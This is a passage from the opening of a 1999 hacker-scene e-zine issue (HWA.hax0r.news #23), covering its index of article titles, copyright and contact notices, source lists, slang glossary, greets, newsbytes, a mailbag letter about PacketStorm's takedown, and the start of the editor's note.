
    [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
  ==========================================================================
  =                       <=-[ HWA.hax0r.news ]-=>                         =
  ==========================================================================
    [=HWA'99=]                         Number 23 Volume 1 1999 July 4th  99
  ==========================================================================
    [                     61:20:6B:69:64:20:63:6F:75:                    ]
    [               6C:64:20:62:72:65:61:6B:20:74:68:69:73:              ]
    [              20:22:65:6E:63:72:79:70:74:69:6F:6E:22:!              ]        
  ==========================================================================


   "I have received more death threats in the last 24 hours by phone, than I
    have in five years," - John Vranesevich aka JP (AntiOnline)                  
                   

     HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net
     and www.digitalgeeks.com thanks to p0lix for the digitalgeeks bandwidth
     and airportman for the Cubesoft bandwidth. Also shouts out to all our
     mirror sites! tnx guys. 
     
     http://www.csoft.net/~hwa
     http://www.digitalgeeks.com/hwa

     
     HWA.hax0r.news Mirror Sites:
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~
     http://www.csoft.net/~hwa/ 
     http://www.digitalgeeks.com/hwa.
     http://members.tripod.com/~hwa_2k
     http://welcome.to/HWA.hax0r.news/
     http://www.attrition.org/~modify/texts/zines/HWA/
     http://packetstorm.harvard.edu/hwahaxornews/     * DOWN *
     http://archives.projectgamma.com/zines/hwa/.  
     http://www.403-security.org/Htmls/hwa.hax0r.news.htm

   
     
     
        
  
   SYNOPSIS (READ THIS)
   --------------------
   
   The purpose of this newsletter is to 'digest' current events of interest
   that affect the online underground and netizens in general. This includes
   coverage of general security issues, hacks, exploits, underground news
   and anything else I think is worthy of a look see. (remember i'm doing
   this for me, not you, the fact some people happen to get a kick/use
   out of it is of secondary importance).

    This list is NOT meant as a replacement for, nor to compete with, the
   likes of publications such as CuD or PHRACK or with news sites such as
   AntiOnline, the Hacker News Network (HNN) or mailing lists such as
   BUGTRAQ or ISN nor could any other 'digest' of this type do so.

    It *is* intended, however, to complement such material and provide a
   reference to those who follow the culture by keeping tabs on as many
   sources as possible and providing links to further info, its a labour
   of love and will be continued for as long as I feel like it, i'm not
   motivated by dollars or the illusion of fame, did you ever notice how
   the most famous/infamous hackers are the ones that get caught? there's
   a lot to be said for remaining just outside the circle... <g>
   
   

   @HWA

   =-----------------------------------------------------------------------=

                     Welcome to HWA.hax0r.news ... #23

   =-----------------------------------------------------------------------=


    
    We could use some more people joining the channel, its usually pretty
    quiet, we don't bite (usually) so if you're hanging out on irc stop
    by and idle a while and say hi...   

    *******************************************************************
    ***      /join #HWA.hax0r.news on EFnet the key is `zwen'       ***
    ***                                                             ***
    *** please join to discuss or impart news on techno/phac scene  ***
    *** stuff or just to hang out ... someone is usually around 24/7***
    ***                                                             ***
    *** Note that the channel isn't there to entertain you its for  ***
    *** you to talk to us and impart news, if you're looking for fun***
    *** then do NOT join our channel try #weirdwigs or something... ***
    *** we're not #chatzone or #hack                                ***
    ***                                                             ***
    *******************************************************************


  =-------------------------------------------------------------------------=
  
  Issue #23

  =--------------------------------------------------------------------------=
  [ INDEX ]
  =--------------------------------------------------------------------------=
    Key     Intros                                                         
  =--------------------------------------------------------------------------=
 
    00.0  .. COPYRIGHTS ......................................................
    00.1  .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
    00.2  .. SOURCES .........................................................
    00.3  .. THIS IS WHO WE ARE ..............................................
    00.4  .. WHAT'S IN A NAME? why `HWA.hax0r.news'?..........................
    00.5  .. THE HWA_FAQ V1.0 ................................................

  =--------------------------------------------------------------------------=
    Key     Content 
  =--------------------------------------------------------------------------=

    01.0  .. GREETS ..........................................................
     01.1 .. Last minute stuff, rumours, newsbytes ...........................
     01.2 .. Mailbag .........................................................
    02.0  .. From the Editor.................................................. 
    AA.A  .. SPECIAL: AntiOnline's JP pulls the plug on PacketStorm Security
    03.0  .. Cable Modem Hijacking from www.hackcanada.com....................
    04.0  .. Exploiting Null Session Weaknesses in NT environment.............
    05.0  .. Cognos PowerPlay Web Edition security vulnerability allows access to data cubes..
    06.0  .. VMware Security Alert............................................
    07.0  .. Security vulnerability in hustler.com login template ............
    08.0  .. DOD investigating computer 'Mob-like' tactics....................
    09.0  .. GSA announces Intrusion Detection Net............................
    10.0  .. Nasa servers reportedly hacked...................................
    11.0  .. UK May Force ISPs to Install Taps................................
    12.0  .. Crypto Tie Downs Loosened .......................................
    13.0  .. Heathen.A Spreads Through Word Files  ...........................
    14.0  .. $950 for a Log File Analysis Tool ...............................
    15.0  .. Youth Charged With $20,000 in Damages ...........................
    16.0  .. Army Fights Online Battle And Loses .............................
    17.0  .. Welfare Reform Law Invades Privacy of US Citizens  ..............
    18.0  .. GSM Mobile Security is Cracked ..................................
    19.0  .. Microsoft Mono-culture Poses National Security Risk .............
    20.0  .. BugTraq Moves To SecurityFocus ..................................
    21.0  .. MS Gives Out Pirate Dough .......................................
    22.0  .. Biometrics comes to Home Shopping ...............................
    23.0  .. Palm VII Revealed ...............................................
    24.0  .. Who Is HNN? .....................................................
    25.0  .. AntiOnline on the trail of f0rpaxe...............................
    26.0  .. Critical NOAA Web Site Attacked .................................
    27.0  .. Back Orifice 2000 is on its Way .................................
    28.0  .. Support for Web Security Spec Announced .........................
    29.0  .. Pentagon Investigates Computer Security Breach ..................
    30.0  .. What will the Next Generation of Viruses Bring? .................
    31.0  .. DIRT still Around, Used by Law Enforcement ......................
    32.0  .. Debit Cards Not Safe on the Internet ............................
    33.0  .. New Definition of 'Computer Hacker' .............................
    34.0  .. Hackers In the Workplace ........................................
    35.0  .. NPR Covers .gov/.mil Defacements. ............................... 
    36.0  .. Australia Passes Major Net Censorship Law .......................
    37.0  .. Hacker crackdown, is your nick on this list?? ...................
    
    =--------------------------------------------------------------------------=   
    
    RUMOURS .Rumours from around and about, mainly HNN stuff (not hacked websites)
    
    AD.S  .. Post your site ads or etc here, if you can offer something in return
             thats tres cool, if not we'll consider ur ad anyways so send it in.
             ads for other zines are ok too btw just mention us in yours, please
             remember to include links and an email contact. Corporate ads will
             be considered also and if your company wishes to donate to or 
             participate in the upcoming Canc0n99 event send in your suggestions
             and ads now...n.b date and time may be pushed back join mailing list
             for up to date information.......................................
             Current dates: Aug19th-22nd Niagara Falls...    .................

    HA.HA  .. Humour and puzzles  ............................................
              
              Hey You!........................................................
              =------=........................................................
              
              Send in humour for this section! I need a laugh and its hard to
              find good stuff... ;)...........................................

    SITE.1 .. Featured site, .................................................
     H.W   .. Hacked Websites  ...............................................
     A.0   .. APPENDICES......................................................
     A.1   .. PHACVW linx and references......................................
 
  =--------------------------------------------------------------------------=
     
     @HWA'99

     
 00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

          THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE
          OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO
          WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT
          (LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST
          READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).
     
          Important semi-legalese and license to redistribute:
     
          YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF
          AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE
          ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED
          IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE
          APPRECIATED the current link is http://welcome.to/HWA.hax0r.news
          IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK
          ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL
          ME PRIVATELY current email cruciphux@dok.org
     
          THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL
          WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL
          THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS:
     
          I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE
          AND REDISTRIBUTE/MIRROR. - EoD
     
     
          Although this file and all future issues are now copyright, some of
         the content holds its  own copyright and these are printed and
         respected. News is news so i'll print any and all news but will quote
         sources when the source is known, if its good enough for CNN its good
         enough for me. And i'm doing it for free on my own time so pfffft. :)
     
         No monies are made or sought through the distribution of this material.
         If you have a problem or concern email me and we'll discuss it.
     
         cruciphux@dok.org
     
         Cruciphux [C*:.]



 00.1 CONTACT INFORMATION AND MAIL DROP
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


     Wahoo, we now have a mail-drop, if you are outside of the U.S.A or
    Canada / North America (hell even if you are inside ..) and wish to
    send printed matter like newspaper clippings a subscription to your
    cool foreign hacking zine or photos, small non-explosive packages
    or sensitive information etc etc well, now you can. (w00t) please
    no more inflatable sheep or plastic dog droppings, or fake vomit
    thanks.

    Send all goodies to:

	    HWA NEWS
	    P.O BOX 44118
	    370 MAIN ST. NORTH
	    BRAMPTON, ONTARIO
	    CANADA
	    L6V 4H5

    WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are
    ~~~~~~~  reading this from some interesting places, make my day and get a
             mention in the zine, send in a postcard, I realize that some places
             it is cost prohibitive but if you have the time and money be a cool
             dude / gal and send a poor guy a postcard preferably one that has some
             scenery from your place of residence for my collection, I collect stamps
             too so you kill two birds with one stone by being cool and mailing in a
             postcard, return address not necessary, just a  "hey guys being cool in
             Bahrain, take it easy" will do ... ;-) thanx.



    Ideas for interesting 'stuff' to send in apart from news:

    - Photo copies of old system manual front pages (optionally signed by you) ;-)
    - Photos of yourself, your mom, sister, dog and or cat in a NON
      compromising position plz I don't want pr0n. <g>
    - Picture postcards
    - CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250
      tapes with hack/security related archives, logs, irc logs etc on em.
    - audio or video cassettes of yourself/others etc of interesting phone
      fun or social engineering examples or transcripts thereof.

    If you still can't think of anything you're probably not that interesting
    a person after all so don't worry about it <BeG>

    Our current email:

    Submissions/zine gossip.....: hwa@press.usmc.net
    Private email to editor.....: cruciphux@dok.org
    Distribution/Website........: sas72@usa.net

    @HWA



 00.2 Sources ***
      ~~~~~~~~~~~

     Sources can be some, all, or none of the following (by no means complete
    nor listed in any degree of importance) Unless otherwise noted, like msgs
    from lists or news from other sites, articles and information is compiled
    and or sourced by Cruciphux no copyright claimed.

    News & I/O zine ................. http://www.antionline.com/
    Back Orifice/cDc................. http://www.cultdeadcow.com/
    News site (HNN) ................. http://www.hackernews.com/
    Help Net Security................ http://net-security.org/
    News,Advisories,++ .............. http://www.l0pht.com/
    NewsTrolls ...................... http://www.newstrolls.com/
    News + Exploit archive .......... http://www.rootshell.com/beta/news.html
    CuD Computer Underground Digest.. http://www.soci.niu.edu/~cudigest
    News site+....................... http://www.zdnet.com/
    News site+Security............... http://www.gammaforce.org/
    News site+Security............... http://www.projectgamma.com/
    News site+Security............... http://securityhole.8m.com/
    News site+Security related site.. http://www.403-security.org/
    News/Humour site+ ............... http://www.innerpulse.com/
    News/Techie news site............ http://www.slashdot.org/
    
    

    +Various mailing lists and some newsgroups, such as ...
    +other sites available on the HNN affiliates page, please see
     http://www.hackernews.com/affiliates.html as they seem to be popping up
     rather frequently ...

    
    http://www.the-project.org/ .. IRC list/admin archives
    http://www.anchordesk.com/  .. Jesse Berst's AnchorDesk

    alt.hackers.malicious
    alt.hackers
    alt.2600
    BUGTRAQ
    ISN security mailing list
    ntbugtraq
    <+others>

    NEWS Agencies, News search engines etc:
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    http://www.cnn.com/SEARCH/
    
    http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0
    
    http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack
    
    http://www.ottawacitizen.com/business/
    
    http://search.yahoo.com.sg/search/news_sg?p=hack
    
    http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack
    
    http://www.zdnet.com/zdtv/cybercrime/
    
    http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)
    
    NOTE: See appendices for details on other links.
    


    http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
    
    http://freespeech.org/eua/ Electronic Underground Affiliation
    
    http://ech0.cjb.net ech0 Security

    http://axon.jccc.net/hir/ Hackers Information Report
    
    http://net-security.org Net Security
    
    http://www.403-security.org Daily news and security related site
    

    Submissions/Hints/Tips/Etc
    ~~~~~~~~~~~~~~~~~~~~~~~~~~

    All submissions that are `published' are printed with the credits
    you provide, if no response is received by a week or two it is assumed
    that you don't care whether the article/email is to be used in an issue
    or not and may be used at my discretion.

    Looking for:

    Good news sites that are not already listed here OR on the HNN affiliates
    page at http://www.hackernews.com/affiliates.html

    Magazines (complete or just the articles) of breaking sekurity or hacker
    activity in your region, this includes telephone phraud and any other
    technological use, abuse hole or cool thingy. ;-) cut em out and send it
    to the drop box.


    - Ed

    Mailing List Subscription Info   (Far from complete)         Feb 1999
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~   ~~~~~~~~~~~~~~~~~~~         ~~~~~~~~

    ISS Security mailing list faq : http://www.iss.net/iss/maillist.html


    THE MOST READ:

    BUGTRAQ - Subscription info
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~

    What is Bugtraq?

    Bugtraq is a full-disclosure UNIX security mailing list, (see the info
    file) started by Scott Chasin <chasin@crimelab.com>. To subscribe to
    bugtraq, send mail to listserv@netspace.org containing the message body
    subscribe bugtraq. I've been archiving this list on the web since late
    1993. It is searchable with glimpse and archived on-the-fly with hypermail.

    Searchable Hypermail Index;

          http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html


    About the Bugtraq mailing list
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    The following comes from Bugtraq's info file:

    This list is for *detailed* discussion of UNIX security holes: what they are,
    how to exploit, and what to do to fix them.

    This list is not intended to be about cracking systems or exploiting their
    vulnerabilities. It is about defining, recognizing, and preventing use of
    security holes and risks.

    Please refrain from posting one-line messages or messages that do not contain
    any substance that can relate to this list`s charter.

    I will allow certain informational posts regarding updates to security tools,
    documents, etc. But I will not tolerate any unnecessary or nonessential "noise"
    on this list.

    Please follow the below guidelines on what kind of information should be posted
    to the Bugtraq list:

    + Information on Unix related security holes/backdoors (past and present)
    + Exploit programs, scripts or detailed processes about the above
    + Patches, workarounds, fixes
    + Announcements, advisories or warnings
    + Ideas, future plans or current works dealing with Unix security
    + Information material regarding vendor contacts and procedures
    + Individual experiences in dealing with above vendors or security organizations
    + Incident advisories or informational reporting

    Any non-essential replies should not be directed to the list but to the originator of the message. Please do not "CC" the bugtraq
    reflector address if the response does not meet the above criteria.

    Remember: YOYOW.

    You own your own words. This means that you are responsible for the words that you post on this list and that reproduction of
    those words without your permission in any medium outside the distribution of this list may be challenged by you, the author.

    For questions or comments, please mail me:
    chasin@crimelab.com (Scott Chasin)


    
    Crypto-Gram
    ~~~~~~~~~~~

       CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
      insights, and commentaries on cryptography and computer security.

      To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
      blank message to crypto-gram-subscribe@chaparraltree.com. To unsubscribe,
      visit http://www.counterpane.com/unsubform.html. Back issues are available
      on http://www.counterpane.com.

       CRYPTO-GRAM is written by Bruce Schneier. Schneier is president of
      Counterpane Systems, the author of "Applied Cryptography," and an inventor
      of the Blowfish, Twofish, and Yarrow algorithms. He served on the board of
      the International Association for Cryptologic Research, EPIC, and VTW. He
      is a frequent writer and lecturer on cryptography.


    CUD Computer Underground Digest
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    This info directly from their latest ish:

    Computer underground Digest    Sun  14 Feb, 1999   Volume 11 : Issue 09

                          ISSN  1004-042X

           Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
           News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
           Archivist: Brendan Kehoe
           Poof Reader:   Etaion Shrdlu, Jr.
           Shadow-Archivists: Dan Carosone / Paul Southworth
                              Ralph Sims / Jyrki Kuoppala
                              Ian Dickinson
           Cu Digest Homepage: http://www.soci.niu.edu/~cudigest



    [ISN] Security list
    ~~~~~~~~~~~~~~~~~~~
    This is a low volume list with lots of informative articles, if I had my
    way i'd reproduce them ALL here, well almost all .... ;-) - Ed


    Subscribe: mail majordomo@repsec.com with "subscribe isn".



    @HWA


 00.3 THIS IS WHO WE ARE
      ~~~~~~~~~~~~~~~~~~
 
      Some HWA members and Legacy staff
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      cruciphux@dok.org.........: currently active/editorial
      darkshadez@ThePentagon.com: currently active/man in black
      fprophet@dok.org..........: currently active/IRC+ man in black
      sas72@usa.net ............: currently active/IRC+ distribution
      vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
      dicentra...(email withheld): IRC+ grrl in black


      Foreign Correspondents/affiliate members
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
       N0Portz ..........................: Australia
       Qubik ............................: United Kingdom
       system error .....................: Indonesia
       Wile (wile coyote) ...............: Japan/the East
       Ruffneck  ........................: Netherlands/Holland

       And unofficially yet contributing too much to ignore ;)

       Spikeman .........................: World media

       Please send in your sites for inclusion here if you haven't already
       also if you want your emails listed send me a note ... - Ed

      Spikeman's site is down as of this writing, if it comes back online it will be
      posted here.
      http://www.hackerlink.or.id/  ............ System Error's site (in Indonesian) 
       

       *******************************************************************
       ***      /join #HWA.hax0r.news on EFnet the key is `zwen'       ***
       *******************************************************************

    :-p


    1. We do NOT work for the government in any shape or form. Unless you count paying
       taxes ... in which case we work for the gov't in a BIG WAY. :-/

    2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news
       events its a good idea to check out issue #1 at least and possibly also the
       Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ...


    @HWA



 00.4 Whats in a name? why HWA.hax0r.news??
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                             
      
      Well what does HWA stand for? never mind if you ever find out I may
     have to get those hax0rs from 'Hackers' or the Pretorians after you.

     In case you couldn't figure it out hax0r is "new skewl" and although
     it is laughed at, shunned, or even pigeonholed with those 'dumb
     leet (l33t?) dewds' <see article in issue #4> this is the state
     of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you
     up  and comers, i'd highly recommend you get that book. Its almost
     like  buying a clue. Anyway..on with the show .. - Editorial staff


     @HWA

00.5  HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Also released in issue #3. (revised) check that issue for the faq
    it won't be reprinted unless changed in a big way with the exception
    of the following excerpt from the FAQ, included to assist first time
    readers:

    Some of the stuff related to personal usage and use in this zine are
    listed below: Some are very useful, others attempt to deny any possible
    attempts at eschewing obfuscation by obscuring their actual definitions.

    @HWA   - see EoA  ;-)

    !=     - Mathematical notation "is not equal to" or "does not equal"
             ASC(247)  "wavey equals" sign means "almost equal" to. If written
             an =/= (equals sign with a slash thru it) also means !=, =< is Equal
             to or less than and =>  is equal to or greater than (etc, this aint
             fucking grade school, cripes, don't believe I just typed all that..)

    AAM    - Ask a minor (someone under age of adulthood, usually <16, <18 or <21)

    AOL    - A great deal of people that got ripped off for net access by a huge
             clueless isp with sekurity that you can drive buses through, we're
             not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the
             least they could try leasing one??

   *CC     - 1 - Credit Card (as in phraud)
             2 - .cc is COCOS (Keeling) ISLANDS but they probably accept cc's

    CCC    - Chaos Computer Club (Germany)

   *CON    - Conference, a place hackers crackers and hax0rs among others go to swap
             ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk
             watch videos and seminars, get drunk, listen to speakers, and last but
             not least, get drunk.
   *CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker
                 speak he's the guy that breaks into systems and is often (but by no
                 means always) a "script kiddie" see pheer
              2 . An edible biscuit usually crappy tasting without a nice dip, I like
                  jalapeno pepper dip or chives sour cream and onion, yum - Ed

    Ebonics - speaking like a rastafarian or hip dude of colour <sic> also wigger
              Vanilla Ice is a wigger, The Beastie Boys and rappers speak using
              ebonics, speaking in a dark tongue ... being ereet, see pheer

    EoC    - End of Commentary

    EoA    - End of Article or more commonly @HWA

    EoF    - End of file

    EoD    - End of diatribe (AOL'ers: look it up)

    FUD    - Coined by Unknown and made famous by HNN <g> - "Fear uncertainty and doubt",
            usually in general media articles not high brow articles such as ours or other
            HNN affiliates ;)

    du0d   - a small furry animal that scurries over keyboards causing people to type
             weird crap on irc, hence when someone says something stupid or off topic
             'du0d wtf are you talkin about' may be used.

   *HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R

   *HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to
            define, I think it is best defined as pop culture's view on The Hacker ala
            movies such as well erhm "Hackers" and The Net etc... usually used by "real"
            hackers or crackers in a derogatory or slang humorous way, like 'hax0r me
            some coffee?' or can you hax0r some bread on the way to the table please?'

            2 - A tool for cutting sheet metal.

    HHN    - Maybe a bit confusing with HNN but we did spring to life around the same
             time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper
             noun means the hackernews site proper. k? k. ;&

    HNN    - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html

    J00    - "you"(as in j00 are OWN3D du0d) - see 0wn3d

    MFI/MOI- Missing on/from IRC

    NFC   - Depends on context: No Further Comment or No Fucking Comment

    NFR   - Network Flight Recorder (Do a websearch) see 0wn3d

    NFW   - No fuckin'way

   *0WN3D - You are cracked and owned by an elite entity see pheer
   *OFCS  - Oh for christ's sakes

    PHACV - And variations of same <coff>
            Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare

          Alternates: H - hacking, hacktivist
                      C - Cracking <software>
                      C - Cracking <systems hacking>
                      V - Virus
                      W - Warfare <cyberwarfare usually as in Jihad>
                      A - Anarchy (explosives etc, Jolly Roger's Cookbook etc)
                      P - Phreaking, "telephone hacking" PHone fREAKs ...
                     CT - Cyber Terrorism

   *PHEER -  This is what you do when an ereet or elite person is in your presence
            see 0wn3d

   *RTFM  - Read the fucking manual - not always applicable since some manuals are
            pure shit but if the answer you seek is indeed in the manual then you
            should have RTFM you dumb ass.

    TBC   - To Be Continued also 2bc (usually followed by ellipses...) :^0

    TBA   - To Be Arranged/To Be Announced also 2ba

    TFS   - Tough fucking shit.

   *w00t  - 1 - Reserved for the uber ereet, no one can say this without severe repercussions
            from the underground masses. also "w00ten" <sic>

            2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers)

    *wtf  - what the fuck

    *ZEN  - The state you reach when you *think* you know everything (but really don't)
            usually shortly after reaching the ZEN like state something will break that
            you just 'fixed' or tweaked.
            
     @HWA            
     
     
                            -=-    :.    .:        -=-
                            
                            
                            

 01.0 Greets!?!?! yeah greets! w0w huh. - Ed
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     Thanks to all in the community for their support and interest but I'd
     like to see more reader input, help me out here, what's good, what sucks
     etc, not that I guarantee I'll take any notice mind you, but send in
     your thoughts anyway.


       * all the people who sent in cool emails and support
       
     FProphet       Pyra                TwstdPair      _NeM_
     D----Y         Kevin Mitnick (watch yer back)     Dicentra
     vexxation      sAs72               Spikeman       Astral
     p0lix          Vexx                g0at security  
     pr0xy          Astral              
     
     Ken Williams/tattooman of PacketStorm, hang in there Ken...:(
          
     and the #innerpulse crew (innerpulse is back!) and some inhabitants 
     of #leetchans ....  although I use the term 'leet loosely these days,
     <k0ff><snicker>  ;)
       
     
     kewl sites:

     + http://www.securityfocus.com NEW
     + http://www.hackcanada.com
     + http://www.l0pht.com/
     + http://www.2600.com/
     + http://www.freekevin.com/
     + http://www.genocide2600.com/
     + http://www.packetstorm.harvard.edu/    ******* DOWN ********* SEE AA.A
     + http://www.hackernews.com/ (Went online same time we started issue 1!)
     + http://www.net-security.org/
     + http://www.slashdot.org/
     + http://www.freshmeat.net/
     + http://www.403-security.org/
     + http://ech0.cjb.net/

     @HWA


 01.1 Last minute stuff, rumours and newsbytes
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

       "What is popular isn't always right, and what is right isn't
         always popular..."
                           - FProphet '99
                           
       

    +++ When was the last time you backed up your important data?
    
     ++ Help Net Security is Moving. 

        contributed by BHZ 
        Help-net Security, an HNN Affiliate, is moving to a new server. Unfortunately they have encountered a few
        problems with transferring the domain. So net-security.org could be nonfunctional for up to 5 days.
        In the meantime you can reach HNS at http://hns.crolink.net 
       
        Help-net Security - Old URL
        http://net-security.org
      
        Help-net Security - New URL
        http://hns.crolink.net
      
    
     ++ TECHNO BRA CALLS THE COPS (TECH. 3:00 am Jul 1st)
        http://www.wired.com/news/news/email/explode-infobeat/technology/story/20517.html

        A security bra monitors the wearer's heart rate to sense
        danger. When activated, it relays her location to the cops
        and helps them make a bust. By Leander Kahney.
 
     ++ ALLEN BUYS ANOTHER CABLE SHOP (BUS. 9:00 am Jul 1st)
        http://www.wired.com/news/news/email/explode-infobeat/business/story/20528.html


        Paul Allen takes another step towards becoming master of his
        own "wired world" with the US$3.1 billion acquisition of
        Bresnan Communications, a Midwest cable operator.

     ++ WAITING FOR WAP (TECH. 3:00 am Jul 1st)
        http://www.wired.com/news/news/email/explode-infobeat/technology/story/20521.html

        Supporters say the Wireless Access Protocol promises to bring
        Web services to tiny cell-phone screens. But when? Chris
        Oakes reports from San Francisco.

     ++ APACHE NOW IN GOOD COMPANY (TECH. Wednesday)
        http://www.wired.com/news/news/email/explode-infobeat/technology/story/20506.html

        The free Web server that has always had the lion's share of
        the market now has a corporation behind it. The nonprofit
        company is being run by Apache's founding fathers.     
        
     ++ SORRY, WRONG NUMBER (WRLD Wednesday)
        http://www.wired.com/news/news/email/explode-infobeat/story/20509.html

        Manhattanites take pride in their 212 area code, a
        distinctive symbol of living in The Most Important Place on
        Earth. But starting Thursday, some of them are going to have
        to adjust to life without 212, when Bell Atlantic begins
        issuing 646 area codes to new phone subscribers in
        Manhattan. The move, necessitated by too many phone numbers,
        is not going down too well, although former New York Mayor
        Ed Koch expects the grousing to stop after an adjustment
        period. Besides, residents of Gotham will still hold on to
        all the other perks that make living there such a joy:
        astronomical rents, overpriced restaurants, and living
        cheek-by-jowl with one another.
        
     ++ ZEROING IN ON CELL-PHONE 911S (TECH. Wednesday)
        http://www.wired.com/news/news/email/explode-infobeat/technology/story/20504.html

        New technology will pinpoint a mobile-phone user's location
        to within 5 feet -- a potential lifesaver in 911 calls. But
        watchdogs say the data will inevitably be within the reach
        of snoops. By Chris Oakes.
   
   
    
      Mucho thanks to Spikeman for directing his efforts to our cause of bringing
      you the news we want to read about in a timely manner ... - Ed

     @HWA

 01.2 MAILBAG - email and posts from the message board worthy of a read
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       -=-
       
       From: "Whimsies & Company" <tbears@cgocable.net> 
       To: <hwa@press.usmc.net> 
       Subject: Please support Justice and Free Speech 
       Date: Thu, 1 Jul 1999 19:18:02 -0400 
       MIME-Version: 1.0 
       Content-Type: text/plain; 
           charset="iso-8859-1" 
       Content-Transfer-Encoding: 7bit 
       X-Priority: 3 
       X-MSMail-Priority: Normal 
       X-Mailer: Microsoft Outlook Express 4.72.3110.5 
       X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3110.3 
       
       
       Dark Modem DOWN For Emergency ACTION
       
       
       OK, two issues: 1) the following message has been sent to a TARGETED
       audience. We have walked a thin line between targeted mailing and spam. If
       we get even one complaint, we will stop. 2) It cannot be confirmed that any
       unusual activity has occurred on the antionline network in the past 24 hours
       *grin* therefore we have taken that statement out of the message.
       
       
       Again, we do NOT advocate spamming, we only want people who might be
       interested in this issue to be aware, so use DISCRETION when sending any
       mail.
       
       
       This is an emergency email message from Dark Modem
       (http://www.darkmodem.org). Yesterday (June 30, 1999), Packet Storm Security
       was taken offline after John Vranesevich sent an email to Harvard University
       about the JP section that was on the site. Some suspect it was really
       jealousy and animosity toward Ken Williams that drove JP to commit this
       offensive act. Packet Storm was in direct competition with antionline and
       essentially blew antionline out of the water in every category. It is this
       author's belief, therefore, that JP was trying to protect his "marketshare"
       (something that Ken Williams would never have done, since he was not in it
       for money).
       
       
       Please show your support by mentioning this topic on your website,
       forwarding this email to "whom it may concern", and sending email in support
       of Ken and PSS to Harvard and antionline.
            
       ================================================================
       
       
      @HWA


 02.0 From the editor.
      ~~~~~~~~~~~~~~~~

     #include <stdio.h>
     #include <thoughts.h>
     #include <backup.h>

     main()
     {
      printf ("Read commented source!\n\n");

     /*
      *Otay buttwheat, here's #23 it might not be as bulging in the
      *pantal area as #22 but it should be a little cleaner (or not)
      *we've had some people coming into the IRC channel on EFNET and
      *just parting, maybe you're just scanning the nicks, but hey we
      *don't bite come and hang out, maybe chat about some of the shit
      *thats going down with Packetstorm or why 2600 is $7.15 in Canada
      *does Eric hate Canadians or whats the story? 
